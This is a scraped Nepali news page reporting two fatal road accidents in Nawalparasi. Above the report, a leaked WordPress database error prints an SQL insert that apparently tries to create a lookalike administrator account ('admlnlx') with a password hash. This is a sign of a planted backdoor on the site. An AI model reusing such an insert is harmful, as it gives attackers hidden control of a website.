WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsbtJfxotBc3EvDN1UKBvTG70JYAJI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-19 21:55:51', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस ५-
नवलपरासीमा सोमबार राति भएका छुट्टाछुट्टै सवारी दुर्घटनामा दुई जनाको मृत्यु भएको छ। इलाका प्रहरी कार्यालय नवलपुरका अनुसार कावासोती खरकट्टा जंगलमा अल्फाबेट नखुलेको ७९८९ नम्बरको बसले ठक्कर दिँदा नाम ठेगाना नखुलेका एक पैदल यात्रुको मृत्यु भएको छ। मृतक अन्दाजी ५५ वर्षीय पुरुषको नाम खुल्न नसकेको प्रहरीले जनाएको छ।
यस्तै कावासोती नगरपालिका-१६ डण्डा हसबासी चोक भित्री सडकमा लु २२ प ९५४६ नम्बरको मोटरसाइकल अनियन्त्रित भई पल्टिँदा एक जनाको मृत्यु भएको छ। राति साढे ११ बजे भएको दुर्घटनामा कावासोती नगरपालिका १४ का २५ वर्षीय मझिलाल गुरौको मृत्यु भएको प्रहरीले जनाएको छ।